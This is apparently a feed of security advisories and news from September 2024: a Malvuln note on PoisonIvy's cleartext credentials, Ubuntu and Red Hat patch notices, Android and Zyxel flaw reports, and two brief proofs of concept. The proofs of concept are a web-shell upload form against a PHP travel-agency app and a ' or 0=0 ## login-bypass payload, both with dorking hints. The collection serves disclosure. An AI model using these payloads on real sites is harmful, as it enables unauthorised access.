Backdoor.Win32.PoisonIvy.ymw malware suffers from an insecure credential storage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b0748f1c1a17bad44dc9bd750fc97547.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.PoisonIvy.ymwVulnerability: Insecure Credential StorageFamily: PoisonIvyType: PE32MD5: b0748f1c1a17bad44dc9bd750fc97547SHA256: 060c15f401ce4d38d70e7f60aabe31c81935d2c261e350c0ea34387886d48920Vuln ID: MVID-2024-0688Dropped files: PILib.dll, Poison Ivy.ini, .pipDisclosure: 09/03/2024Description: PoisonIvy listens on TCP port 3460 by default but that can be changed. When generating PoisonIvy PE files, credentials are stored in cleartext if not using the PasswordKey=1 option which gets stored in ".pik" files. The "Ivy.ini" configuration and profile ".pip" files also contain credentials in cleartext."malvuln.pip" [Advanced]PEbinary=1PEc=0PEd=0PEp=0PE=1FileAlign=512KeyLogger=0InjectServer=0Persistence=0ProcessMutex=)!VoqA.I4CustomInject=0CustomInjectProc=msnmsgr.exe[Connection]Group=HijackProxy=0HijackProxyPersist=0DNS=192.168.18.125:3460:0,ID=malvulnPassword=apparitionsecPasswordKey=0Proxy=0ProxyDNS=[Install]Startup=0StartupHKLM=1StartupActiveX=0ActiveXKey=HKLMName=Copy=0Filename=CopySystem=1CopyWindows=0ADS=0Melt=0[Build]Icon=bThirdParty=0ThirdParty=upx.exe "%s""Poison Ivy.ini"[Disclaimer]Show=1[Settings]RemoveKeyFile=1StorePlugins=1SDrounds=3HidePW=0PlaySound=0SoundPath=%PI%\sound.wavCache=1CachePath=%PI%\Users\%USR%\ImagePath=%PI%\Users\%USR%\Images\AudioPath=%PI%\Users\%USR%\Audio\NotesPath=%PI%\Notes\AutoRefresh=0WindowColor=1TimestampColor=1KeynameColor=1WindowName=008000Timestamp=0000FFKeyname=808080AutoRemove=1AutoLookUpdates=1SimTransfers=2DownloadPath=%PI%\Users\%USR%\Download\ProfilePath=%PI%\Profiles\PluginPath=%PI%\Plugins\TreeLayout=1CloseTray=0MinimizeTray=1BalloonTip=1Prompt=0PromptExit=0PromptDelete=1ColumnInfo=1Groups=0ColumnPath=%PI%\Data\Thumbs=0ThumbSize=96Highlight=0HighlightExt=ScrSize=75ScrBits=24ShareTo=ShareToSocks=ShareSocks=0[Placement]DataTransfers=1MaximizedState=0Top=63Left=416Width=936Height=540ConTop=132ConLeft=260ConWidth=650ConHeight=380[Client0]Port=3460KeyFile=0Password=adminExploit/PoC:DE:0055DD64 aPassword_7     db 'Password: *****',0  ; DATA XREF: sub_55D128+292↑oCODE:0055DD74                 dd 0FFFFFFFFh, 5CODE:0055DD7C aAdmin_2        db 'admin',0            ; DATA XREF: sub_55D128:loc_55D3C6↑o004016C0                 db  61h ; a004016C1                 db  70h ; p004016C2                 db  70h ; p004016C3                 db  61h ; a004016C4                 db  72h ; r004016C5                 db  69h ; i004016C6                 db  74h ; t004016C7                 db  69h ; i004016C8                 db  6Fh ; o004016C9                 db  6Eh ; n004016CA                 db  73h ; s004016CB                 db  65h ; e004016CC                 db  63h ; cDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.PoisonIvy.ymw MVID-2024-0688 Insecure Credential Storage

Ubuntu Security Notice 6981-2 - USN-6981-1 fixed vulnerabilities in Drupal. This update provides the corresponding updates for Ubuntu 14.04 LTS. It was discovered that Drupal incorrectly sanitized uploaded filenames. A remote attacker could possibly use this issue to execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6981-2September 03, 2024drupal7 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 14.04 LTSSummary:Drupal could be made to crash or run programs if it receivedspecially crafted network traffic.Software Description:- drupal7: fully-featured content management frameworkDetails:USN-6981-1 fixed vulnerabilities in Drupal. This update provides thecorresponding updates for Ubuntu 14.04 LTS.Original advisory details:  It was discovered that Drupal incorrectly sanitized uploaded filenames. A  remote attacker could possibly use this issue to execute arbitrary code.  (CVE-2020-13671)  It was discovered that Drupal incorrectly sanitized archived filenames. A  remote attacker could possibly use this issue to overwrite arbitrary  files, or execute arbitrary code. (CVE-2020-28948, CVE-2020-28949)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 14.04 LTS   drupal7                         7.26-1ubuntu0.1+esm2                                   Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6981-2   https://ubuntu.com/security/notices/USN-6981-1   CVE-2020-13671, CVE-2020-28948, CVE-2020-28949

Ubuntu Security Notice USN-6981-2

Ubuntu Security Notice 6987-1 - It was discovered that Django incorrectly handled certain inputs. An attacker could possibly use this issue to cause a denial of service. It was discovered that Django incorrectly handled certain email sending failures. A remote attacker could possibly use this issue to enumerate user emails by issuing password reset requests and observing the outcomes.

==========================================================================  
Ubuntu Security Notice USN-6987-1  
September 03, 2024

python-django vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in Django.

Software Description:  
- python-django: High-level Python web development framework

Details:

It was discovered that Django incorrectly handled certain inputs.  
An attacker could possibly use this issue to cause a denial of service.  
(CVE-2024-45230)

It was discovered that Django incorrectly handled certain email sending  
failures. A remote attacker could possibly use this issue to enumerate  
user emails by issuing password reset requests and observing the outcomes.  
(CVE-2024-45231)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  python3-django                  3:4.2.11-1ubuntu1.3

Ubuntu 22.04 LTS  
  python3-django                  2:3.2.12-2ubuntu1.14

Ubuntu 20.04 LTS  
  python3-django                  2:2.2.12-1ubuntu0.25

Ubuntu 18.04 LTS  
  python-django                   1:1.11.11-1ubuntu1.21+esm7  
                                  Available with Ubuntu Pro  
  python3-django                  1:1.11.11-1ubuntu1.21+esm7  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6987-1  
  CVE-2024-45230, CVE-2024-45231

Package Information:  
  https://launchpad.net/ubuntu/+source/python-django/3:4.2.11-1ubuntu1.3  
  https://launchpad.net/ubuntu/+source/python-django/2:3.2.12-2ubuntu1.14  
  https://launchpad.net/ubuntu/+source/python-django/2:2.2.12-1ubuntu0.25

Ubuntu Security Notice USN-6987-1

Online Travel Agency System version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : Travel v1.0 Remote File Upload Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://github.com/oretnom23/php-travel-agency-system                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .<form action="http://127.0.0.1/tour/admin/operations/admin.php?id=2" method="POST" enctype="multipart/form-data">   <label for="file">Upload File:</label>  <input type="file" id="file" name="file"><br><br>  <input type="submit" name="Fcuk Up" value="Fcuk Up"></form>[+] Go to the line 1.[+] Set the target site link Save changes and apply . [+] infected file : /tour/admin/operations/admin.php. [+] save code as poc.html .[+] Path : http://127.0.0.1/tour/admin/upload/webadmin.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Online Travel Agency System 1.0 Shell Upload

Red Hat Security Advisory 2024-6297-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6297.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel security update  
Advisory ID:        RHSA-2024:6297-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6297  
Issue date:         2024-09-04  
Revision:           03  
CVE Names:          CVE-2021-47138  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: cxgb4: avoid accessing registers when clearing filters (CVE-2021-47138)

* kernel: hv_netvsc: Fix race condition between netvsc_probe and netvsc_remove (CVE-2024-26698)

* kernel: mm/slub: fix to return errno if kmalloc() fails (CVE-2022-48659)

* kernel: Squashfs: check the inode number is not the invalid value of zero (CVE-2024-26982)

* kernel: vt: fix unicode buffer corruption when deleting characters (CVE-2024-35823)

* kernel: nvme-rdma: destroy cm id before destroy qp to avoid use after free (CVE-2021-47378)

* kernel: userfaultfd: fix a race between writeprotect and exit_mmap() (CVE-2021-47461)

* kernel: r8169: Fix possible ring buffer corruption on fragmented Tx packets. (CVE-2024-38586)

* kernel: bpf: Add BPF_PROG_TYPE_CGROUP_SKB attach type enforcement in BPF_LINK_CREATE (CVE-2024-38564)

* kernel: bnxt_re: avoid shift undefined behavior in bnxt_qplib_alloc_init_hwq (CVE-2024-38540)

* kernel: iommu: Fix potential use-after-free during probe (CVE-2022-48796)

* kernel: xfs: add bounds checking to xlog_recover_process_data (CVE-2024-41014)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47138

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2271484  
https://bugzilla.redhat.com/show_bug.cgi?id=2273117  
https://bugzilla.redhat.com/show_bug.cgi?id=2277801  
https://bugzilla.redhat.com/show_bug.cgi?id=2278337  
https://bugzilla.redhat.com/show_bug.cgi?id=2281190  
https://bugzilla.redhat.com/show_bug.cgi?id=2282362  
https://bugzilla.redhat.com/show_bug.cgi?id=2282896  
https://bugzilla.redhat.com/show_bug.cgi?id=2293402  
https://bugzilla.redhat.com/show_bug.cgi?id=2293429  
https://bugzilla.redhat.com/show_bug.cgi?id=2293459  
https://bugzilla.redhat.com/show_bug.cgi?id=2298132  
https://bugzilla.redhat.com/show_bug.cgi?id=2300297

Red Hat Security Advisory 2024-6297-03

Tourism Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Tourism Management System 1.0 Auth BY Pass Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tourism_1.zip                                         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : ' or 0=0 ##[+] http://localhost/tourism/admin/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tourism Management System 1.0 SQL Injection

Red Hat Security Advisory 2024-6268-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6268.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel-rt security update  
Advisory ID:        RHSA-2024:6268-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6268  
Issue date:         2024-09-04  
Revision:           03  
CVE Names:          CVE-2024-26946  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: kprobes/x86: Use copy_from_kernel_nofault() to read from unsafe address (CVE-2024-26946)

* kernel: netfilter: bridge: replace physindev with physinif in nf_bridge_info (CVE-2024-35839)

* kernel: bpf, sockmap: Prevent lock inversion deadlock in map delete elem (CVE-2024-35895)

* kernel: x86/coco: Require seeding RNG with RDRAND on CoCo systems (CVE-2024-35875)

* kernel: gfs2: Fix potential glock use-after-free on unmount (CVE-2024-38570)

* kernel: bnxt_re: avoid shift undefined behavior in bnxt_qplib_alloc_init_hwq (CVE-2024-38540)

* kernel: ionic: fix use after netif_napi_del() (CVE-2024-39502)

* kernel: mm/huge_memory: don't unpoison huge_zero_folio (CVE-2024-40914)

* kernel: dmaengine: idxd: Fix possible Use-After-Free in irq_process_work_list (CVE-2024-40956)

* kernel: scsi: qedi: Fix crash while reading debugfs attribute (CVE-2024-40978)

* kernel: tipc: force a dst refcount before doing decryption (CVE-2024-40983)

* kernel: ppp: reject claimed-as-LCP but actually malformed packets (CVE-2024-41044)

* kernel: Revert "mm/writeback: fix possible divide-by-zero in wb_dirty_limits(), again" (CVE-2024-42102)

* kernel: mm: avoid overflows in dirty throttling logic (CVE-2024-42131)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-26946

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2278206  
https://bugzilla.redhat.com/show_bug.cgi?id=2281284  
https://bugzilla.redhat.com/show_bug.cgi?id=2281677  
https://bugzilla.redhat.com/show_bug.cgi?id=2281727  
https://bugzilla.redhat.com/show_bug.cgi?id=2293423  
https://bugzilla.redhat.com/show_bug.cgi?id=2293459  
https://bugzilla.redhat.com/show_bug.cgi?id=2297474  
https://bugzilla.redhat.com/show_bug.cgi?id=2297498  
https://bugzilla.redhat.com/show_bug.cgi?id=2297540  
https://bugzilla.redhat.com/show_bug.cgi?id=2297562  
https://bugzilla.redhat.com/show_bug.cgi?id=2297567  
https://bugzilla.redhat.com/show_bug.cgi?id=2300414  
https://bugzilla.redhat.com/show_bug.cgi?id=2301465  
https://bugzilla.redhat.com/show_bug.cgi?id=2301496

Red Hat Security Advisory 2024-6268-03

Red Hat Security Advisory 2024-6267-03 - An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6267.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel security update  
Advisory ID:        RHSA-2024:6267-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6267  
Issue date:         2024-09-04  
Revision:           03  
CVE Names:          CVE-2024-26946  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: kprobes/x86: Use copy_from_kernel_nofault() to read from unsafe address (CVE-2024-26946)

* kernel: netfilter: bridge: replace physindev with physinif in nf_bridge_info (CVE-2024-35839)

* kernel: bpf, sockmap: Prevent lock inversion deadlock in map delete elem (CVE-2024-35895)

* kernel: x86/coco: Require seeding RNG with RDRAND on CoCo systems (CVE-2024-35875)

* kernel: gfs2: Fix potential glock use-after-free on unmount (CVE-2024-38570)

* kernel: bnxt_re: avoid shift undefined behavior in bnxt_qplib_alloc_init_hwq (CVE-2024-38540)

* kernel: ionic: fix use after netif_napi_del() (CVE-2024-39502)

* kernel: mm/huge_memory: don't unpoison huge_zero_folio (CVE-2024-40914)

* kernel: dmaengine: idxd: Fix possible Use-After-Free in irq_process_work_list (CVE-2024-40956)

* kernel: scsi: qedi: Fix crash while reading debugfs attribute (CVE-2024-40978)

* kernel: tipc: force a dst refcount before doing decryption (CVE-2024-40983)

* kernel: ppp: reject claimed-as-LCP but actually malformed packets (CVE-2024-41044)

* kernel: Revert "mm/writeback: fix possible divide-by-zero in wb_dirty_limits(), again" (CVE-2024-42102)

* kernel: mm: avoid overflows in dirty throttling logic (CVE-2024-42131)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-26946

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2278206  
https://bugzilla.redhat.com/show_bug.cgi?id=2281284  
https://bugzilla.redhat.com/show_bug.cgi?id=2281677  
https://bugzilla.redhat.com/show_bug.cgi?id=2281727  
https://bugzilla.redhat.com/show_bug.cgi?id=2293423  
https://bugzilla.redhat.com/show_bug.cgi?id=2293459  
https://bugzilla.redhat.com/show_bug.cgi?id=2297474  
https://bugzilla.redhat.com/show_bug.cgi?id=2297498  
https://bugzilla.redhat.com/show_bug.cgi?id=2297540  
https://bugzilla.redhat.com/show_bug.cgi?id=2297562  
https://bugzilla.redhat.com/show_bug.cgi?id=2297567  
https://bugzilla.redhat.com/show_bug.cgi?id=2300414  
https://bugzilla.redhat.com/show_bug.cgi?id=2301465  
https://bugzilla.redhat.com/show_bug.cgi?id=2301496

Red Hat Security Advisory 2024-6267-03

Google has released its monthly security updates for the Android operating system to address a known security flaw that it said has come under active exploitation in the wild.
The high-severity vulnerability, tracked as CVE-2024-32896 (CVSS score: 7.8), relates to a case of privilege escalation in the Android Framework component.
According to the description of the bug in the NIST National

Vulnerability / Mobile Security

Google has released its monthly security updates for the Android operating system to address a known security flaw that it said has come under active exploitation in the wild.

The high-severity vulnerability, tracked as CVE-2024-32896 (CVSS score: 7.8), relates to a case of privilege escalation in the Android Framework component.

According to the description of the bug in the NIST National Vulnerability Database (NVD), it concerns a logic error that could lead to local escalation of privileges without requiring any additional execution privileges.

"There are indications that CVE-2024-32896 may be under limited, targeted exploitation," Google said in its Android Security Bulletin for September 2024.

It's worth noting that CVE-2024-32896 was first disclosed in June 2024 as impacting only the Google-owned Pixel lineup.

There are currently no details on how the vulnerability is being exploited in the wild, although GrapheneOS maintainers revealed that CVE-2024-32896 plugs a partial solution for CVE-2024-29748, another Android flaw that has been weaponized by forensic companies.

Google later confirmed to The Hacker News that the impact of CVE-2024-32896 goes beyond Pixel devices to include the entire Android ecosystem and that it's working with original equipment manufacturers (OEMs) to apply the fixes where applicable.

"This vulnerability requires physical access to the device to exploit and interrupts the factory reset process," Google noted at the time. "Additional exploits would be needed to compromise the device."

"We are prioritizing applicable fixes for other Android OEM partners and will roll them out as soon as they are available. As a best security practice, users should always update their devices whenever there are new security updates available."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Confirms CVE-2024-32896 Exploited in the Wild, Releases Android Security Patch

Zyxel has released software updates to address a critical security flaw impacting certain access point (AP) and security router versions that could result in the execution of unauthorized commands.

Tracked as CVE-2024-7261 (CVSS score: 9.8), the vulnerability has been described as a case of operating system (OS) command injection.

"The improper neutralization of special elements in the

Vulnerability / Network Security

Zyxel has released software updates to address a critical security flaw impacting certain access point (AP) and security router versions that could result in the execution of unauthorized commands.

Tracked as CVE-2024-7261 (CVSS score: 9.8), the vulnerability has been described as a case of operating system (OS) command injection.

"The improper neutralization of special elements in the parameter 'host' in the CGI program of some AP and security router versions could allow an unauthenticated attacker to execute OS commands by sending a crafted cookie to a vulnerable device," Zyxel said in an advisory.

Chengchao Ai from the ROIS team of Fuzhou University has been credited with discovering and reporting the flaw.

Zyxel has also shipped updates for seven vulnerabilities in its routers and firewalls, including few that are high in severity, that could result in OS command execution, a denial-of-service (DoS), or access browser-based information -

*   CVE-2024-5412 (CVSS score: 7.5) - A buffer overflow vulnerability in the "libclinkc" library that could allow an unauthenticated attacker to cause DoS conditions by means of a specially crafted HTTP request

*   CVE-2024-6343 (CVSS score: 4.9) - A buffer overflow vulnerability that could allow an authenticated attacker with administrator privileges to trigger DoS conditions by means of a specially crafted HTTP request

*   CVE-2024-7203 (CVSS score: 7.2) - A post-authentication command injection vulnerability that could allow an authenticated attacker with administrator privileges to execute OS commands

*   CVE-2024-42057 (CVSS score: 8.1) - A command injection vulnerability in the IPSec VPN feature that could allow an unauthenticated attacker to execute some OS commands

*   CVE-2024-42058 (CVSS score: 7.5) - A null pointer dereference vulnerability that could allow an unauthenticated attacker to cause DoS conditions by sending crafted packets

*   CVE-2024-42059 (CVSS score: 7.2) - A post-authentication command injection vulnerability that could allow an authenticated attacker with administrator privileges to execute some OS commands by uploading a crafted compressed language file via FTP

*   CVE-2024-42060 (CVSS score: 7.2) - A post-authentication command injection vulnerability in some firewall versions could allow an authenticated attacker with administrator privileges to execute some OS commands

*   CVE-2024-42061 (CVSS score: 6.1) - A reflected cross-site scripting (XSS) vulnerability in the CGI program "dynamic\_script.cgi" that could allow an attacker to trick a user into visiting a crafted URL with the XSS payload and obtain browser-based information

The development comes as D-Link said four security vulnerabilities affecting its DIR-846 router, counting two critical remote command execution vulnerabilities (CVE-2024-44342, CVSS score: 9.8) will not be patched owing to the products reaching end-of-life (EoL) status of February 2020, urging customers to replace them with support versions.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#vulnerability